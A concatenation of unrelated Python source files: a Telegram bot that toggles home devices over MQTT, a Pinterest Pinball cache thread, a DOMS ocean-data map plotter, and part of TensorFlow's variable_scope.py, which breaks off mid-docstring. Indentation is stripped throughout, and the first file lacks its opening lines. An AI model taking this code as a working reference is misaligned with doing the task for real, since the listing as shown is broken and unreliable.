TOKEN = os.environ.get('TOKEN', None)
TOPIC = [os.environ.get('TOPIC_1', None), os.environ.get('TOPIC_2', None)]
URL_STR = os.environ.get('URL_STR', None)
HEROKU = os.environ.get('HEROKU', None)
import paho.mqtt.client as mqtt #pip install paho-mqtt
from queue import Queue
import cherrypy
import logging
import telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, Dispatcher
import time
import threading
import urllib.parse as urlparse
TOPIC_STATUS = [0, 0]
TOPIC_CHANGES = [0, 0]
text_topic = ["Cвет в спальне ", "Удлинитель "]
text_ON = "Включить"
text_OFF = "Выключить"
reply_ON = "Включено"
reply_OFF = "Выключено"
#https://apps.timwhitlock.info/emoji/tables/unicode
icon_ON=u'\U00002705' #2705
icon_OFF=u'\U0000274C' #274C
chat_ids = [199220133, 537459034, 1069772271]
if HEROKU == '1':
print("HEROKU")
bot = telegram.Bot(token=TOKEN, base_url='api.telegram.org/bot')
else:
bot = telegram.Bot(token=TOKEN, base_url='dg-telegram-bot-2.herokuapp.com/bot')
#logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Define event callbacks
def on_connect(client, userdata, flags, rc):
print("on_connect rc: " + str(rc))
def on_message(client, obj, msg):
global TOPIC_STATUS
print("on_message " + msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
for i, t in enumerate(TOPIC):
if msg.topic == t:
TOPIC_CHANGES[i] = 1
if msg.payload == b'ON':
TOPIC_STATUS[i] = 1
elif msg.payload == b'OFF':
TOPIC_STATUS[i] = 0
print(TOPIC,TOPIC_STATUS,TOPIC_CHANGES)
send_KB_()
def on_publish(client, obj, mid):
print("on_publish mid: " + str(mid))
def on_subscribe(client, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(client, obj, level, string):
print(string)
mqttc = mqtt.Client()
# Assign event callbacks
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Uncomment to enable debug messages
#mqttc.on_log = on_log
# Parse CLOUDMQTT_URL (or fallback to localhost)
url = urlparse.urlparse(URL_STR)
# Connect
mqttc.username_pw_set(url.username, url.password)
mqttc.connect(url.hostname, url.port)
#mqttc.connect_async(url.hostname, url.port)
# Start subscribe, with QoS level 0
for t in TOPIC:
mqttc.subscribe(t)
def send_KB_():
icon = []
not_icon = []
text = []
reply = " "
icon_reply = " "
for s,c in zip(TOPIC_STATUS,TOPIC_CHANGES):
icon.append(icon_ON if s else icon_OFF)
not_icon.append(icon_OFF if s else icon_ON)
text.append(text_OFF if s else text_ON)
if c == 1:
reply = reply_ON if s else reply_OFF
icon_reply = icon_ON if s else icon_OFF
print(icon, not_icon, text)
custom_keyboard = [[text_topic[1] + icon[1], text_topic[0] + icon[0]],
[text_topic[1] + "\n" + text[1] + " " + not_icon[1], text_topic[0] + "\n" + text[0] + " " + not_icon[0]]]
reply_markup = telegram.ReplyKeyboardMarkup(custom_keyboard)
for chat_id in chat_ids:
try:
bot.send_message(chat_id=chat_id, text=reply + " " + icon_reply, reply_markup=reply_markup)
except:
pass
TOPIC_CHANGES[0] = 0
TOPIC_CHANGES[1] = 0
class SimpleWebsite(object):
@cherrypy.expose
def index(self):
return """<H1>Welcome!</H1>"""
class BotComm(object):
exposed = True
def __init__(self, TOKEN, NAME):
super(BotComm, self).__init__()
self.TOKEN = TOKEN
self.NAME = NAME
self.bot = telegram.Bot(self.TOKEN)
try:
self.bot.setWebhook("https://{}.herokuapp.com/{}".format(self.NAME, self.TOKEN))
except:
raise RuntimeError("Failed to set the webhook")
self.update_queue = Queue()
self.dp = Dispatcher(self.bot, self.update_queue)
self.dp.add_handler(CommandHandler("start", self._start))
self.dp.add_handler(MessageHandler(Filters.text, self._handler))
self.dp.add_error_handler(self._error)
@cherrypy.tools.json_in()
def POST(self, *args, **kwargs):
update = cherrypy.request.json
update = telegram.Update.de_json(update, self.bot)
self.dp.process_update(update)
def _error(self, error):
cherrypy.log("Error occurred - {}".format(error))
def _start(self, bot, update):
update.effective_message.reply_text("Hi!")
def _handler(self, bot, update):
global TOPIC
global TOPIC_STATUS
print("MESSAGE", update.message.chat_id, update.message.text)
if update.message.text == 'kb' or update.message.text == 'keyboard':
send_KB_()
elif text_ON in update.message.text and text_topic[0] in update.message.text:
mqttc.publish(TOPIC[0], "ON", 0, True)
TOPIC_CHANGES[0] = 1
elif text_OFF in update.message.text and text_topic[0] in update.message.text:
mqttc.publish(TOPIC[0], "OFF", 0, True)
TOPIC_CHANGES[0] = 1
elif text_ON in update.message.text and text_topic[1] in update.message.text:
mqttc.publish(TOPIC[1], "ON", 0, True)
TOPIC_CHANGES[1] = 1
elif text_OFF in update.message.text and text_topic[1] in update.message.text:
mqttc.publish(TOPIC[1], "OFF", 0, True)
TOPIC_CHANGES[1] = 1
else:
update.message.reply_text(text=update.message.text)
class ExcThread(threading.Thread):
"""LogThread should always e used in preference to threading.Thread.
The interface provided by LogThread is identical to that of threading.Thread,
however, if an exception occurs in the thread the error will be logged
(using logging.exception) rather than printed to stderr.
This is important in daemon style applications where stderr is redirected
to /dev/null.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._real_run = self.run
self.run = self._wrap_run
def _wrap_run(self):
try:
self._real_run()
except:
print("CATCHED EXCEPTION")
if __name__ == "__main__":
# Port is given by Heroku
PORT = os.environ.get('PORT', '5000')
# Set up the cherrypy configuration
cherrypy.config.update({'server.socket_host': '0.0.0.0', })
cherrypy.config.update({'server.socket_port': int(PORT), })
cherrypy.tree.mount(SimpleWebsite(), "/")
cherrypy.tree.mount(BotComm(TOKEN, NAME),
"/{}".format(TOKEN),
{'/': {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}})
print('START ... ')
#thread1 = threading.Thread(target=mqttc.loop_start())
thread1 = ExcThread(target=mqttc.loop_start())
thread1.start()
print('MIDDLE ... ')
#thread2 = threading.Thread(target=cherrypy.engine.start()) # updater.idle()
thread2 = ExcThread(target=cherrypy.engine.start()) # updater.idle()
thread2.start()
print('END ... ')
|
cache_thread.py
|
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from threading import Thread
from pinball.config.utils import get_log
from pinball.ui.data_builder import DataBuilder
LOG = get_log('pinball.ui.cache_thread')
__author__ = 'Julia Oh, Mao Ye'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = ['Julia Oh', 'Mao Ye']
__license__ = 'Apache'
__version__ = '2.0'
def start_cache_thread(dbstore):
"""Creates and starts a daemon thread for workflow data computation.
This method is called when pinball ui server starts.
Args:
dbstore: The store to retrieve runs status.
Returns:
cache_thread
"""
thread = Thread(target=_compute_workflow, args=[dbstore])
thread.daemon = True
thread.start()
return thread
def _compute_workflow(dbstore):
"""Cache thread's target callable that computes the workflow.
This runnable is called my thread's run() method when thread
starts. It will compute workflows data, serialize it, and store it
in _WORKFLOW_JSON. This computation will infinitely
repeat itself, constantly updating the _WORKFLOW_JSON until pinball_ui
server stops.
Args:
dbstore: The store to retrieve runs status.
"""
global _WORKFLOWS_JSON
data_builder = DataBuilder(dbstore, use_cache=True)
while True:
try:
LOG.info("Workflow data computation starting.")
workflows_data = data_builder.get_workflows()
schedules_data = data_builder.get_schedules()
_WORKFLOWS_JSON = _serialize(workflows_data, schedules_data)
LOG.info("Workflow data computation complete.")
# TODO(mao): Tune this parameter depending on future
# pinball user experience.
# TODO(mao): Make this computation run at scheduled time intervals
# and cancel the next execution if the previous job hasn't
# finished.
time.sleep(60 * 20)
except Exception as e:
LOG.exception(e)
def _serialize(workflows_data, schedules_data):
workflow_emails = {}
workflows_info = []
for schedule in schedules_data:
workflow_emails[schedule.workflow] = schedule.emails
for workflow in workflows_data:
workflow_data = workflow.format()
if workflow.workflow in workflow_emails:
workflow_data['owners'] = ','.join(email.split('@')[0]
for email in workflow_emails[workflow.workflow])
else:
workflow_data['owners'] = 'N/A'
workflows_info.append(workflow_data)
return json.dumps({'aaData': workflows_info})
def get_workflows_json():
return _WORKFLOWS_JSON
_WORKFLOWS_JSON = _serialize([], [])
|
mapplot.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
from . import BaseDomsHandler
from . import ResultsStorage
if not matplotlib.get_backend():
matplotlib.use('Agg')
PARAMETER_TO_FIELD = {
"sst": "sea_water_temperature",
"sss": "sea_water_salinity"
}
PARAMETER_TO_UNITS = {
"sst": "($^\circ$ C)",
"sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
if maxLat - minLat > maxLon - minLon:
a = ((maxLat - minLat) - (maxLon - minLon)) / 2.0
minLon -= a
maxLon += a
elif maxLon - minLon > maxLat - minLat:
a = ((maxLon - minLon) - (maxLat - minLat)) / 2.0
minLat -= a
maxLat += a
return minLon, maxLon, minLat, maxLat
def render(d, lats, lons, z, primary, secondary, parameter):
fig = plt.figure()
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_title(f'{primary} vs. {secondary}')
# ax.set_ylabel('Latitude')
# ax.set_xlabel('Longitude')
minLatA = np.min(lats)
maxLatA = np.max(lats)
minLonA = np.min(lons)
maxLonA = np.max(lons)
minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
# m = Basemap(projection='mill', llcrnrlon=-180,llcrnrlat=-80,urcrnrlon=180,urcrnrlat=80,resolution='l')
m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
resolution='l')
m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
m.drawcoastlines()
m.drawmapboundary(fill_color='#99ffff')
m.fillcontinents(color='#cc9966', lake_color='#99ffff')
# lats, lons = np.meshgrid(lats, lons)
masked_array = np.ma.array(z, mask=np.isnan(z))
z = masked_array
values = np.zeros(len(z))
for i in range(0, len(z)):
values[i] = ((z[i] - np.min(z)) / (np.max(z) - np.min(z)) * 20.0) + 10
x, y = m(lons, lats)
im1 = m.scatter(x, y, values)
im1.set_array(z)
cb = m.colorbar(im1)
units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
cb.set_label("Difference %s" % units)
buf = io.BytesIO()
plt.savefig(buf, format='png')
plot = buf.getvalue()
if d is not None:
d['plot'] = plot
return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
computeOptions=None, executionId=None, plot=None):
BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
details=details, bounds=bounds, count=count,
computeOptions=computeOptions, executionId=executionId)
self.__lats = lats
self.__lons = lons
self.__z = np.array(z)
self.__parameter = parameter
self.__primary = primary
self.__secondary = secondary
self.__plot = plot
def toImage(self):
return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
manager = Manager()
d = manager.dict()
p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
p.start()
p.join()
return d['plot']
def createMapPlot(id, parameter, config=None):
with ResultsStorage.ResultsRetrieval(config) as storage:
params, stats, data = storage.retrieveResults(id)
primary = params["primary"]
secondary = params["matchup"][0]
lats = []
lons = []
z = []
field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
for entry in data:
for match in entry["matches"]:
if match["source"] == secondary:
if field in entry and field in match:
a = entry[field]
b = match[field]
z.append((a - b))
z.append((a - b))
else:
z.append(1.0)
z.append(1.0)
lats.append(entry["y"])
lons.append(entry["x"])
lats.append(match["y"])
lons.append(match["x"])
plot = renderAsync(lats, lons, z, primary, secondary, parameter)
r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
args=params,
details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
return r
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.types import core
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
__slots__ = ["_full_shape", "_var_offset"]
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_abc.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_abc.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for offset, shape in zip(var_offset, full_shape):
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_abc.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
def _needs_no_arguments(python_callable):
"""Returns true if the callable needs no arguments to call."""
# TODO(bfontain): Switch to inspect.signature when we are python 3 only.
# signature = inspect.signature(python_callable)
# return not [1 for param in signature.parameters.values()
# if param.default == param.empty]
num_arguments = len(tf_inspect.getargspec(python_callable).args)
if not tf_inspect.isfunction(python_callable) and not isinstance(
python_callable, functools.partial):
# getargspec includes self for function objects (which aren't
# functools.partial). This has no default so we need to remove it.
# It is not even an argument so its odd that getargspec returns this.
# Note that this is fixed with inspect.signature in Python 3.
num_arguments -= 1
return num_arguments == len(
tf_inspect.getargspec(python_callable).defaults or [])
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
__slots__ = ["_vars", "_partitioned_vars", "_store_eager_variables"]
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_abc.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
